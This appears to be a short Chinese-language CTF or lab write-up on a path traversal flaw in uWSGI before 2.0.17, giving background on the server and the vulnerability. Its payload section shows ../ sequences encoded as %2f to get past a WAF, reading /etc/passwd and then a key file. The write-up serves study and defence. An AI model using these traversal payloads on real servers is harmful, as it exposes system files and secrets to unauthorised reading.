标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2025-2629] 作者: 闲云野鸡 发表于: [2020-04-03]
本文共 [323] 位读者顶过
背景介绍
uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。
[出自:jiwo.org]
uWSGI 2.0.17之前版本中存在路径遍历漏洞,使用../可返回上级目录,由于/被过滤,使用%2f绕过
uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。 uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘..’序列的特制URL请求利用该漏洞查看系统上的任意文件。
payload:
先尝试 ../../……../etc/passwd读取文件
发现被waf 换..%2f..%2f..%2f..%2f.......%2fetc%2fpasswd 确认漏洞存在
http://ip/..%2f..%2f..%2f..%2f..%2fkey.txt 最后读取key
|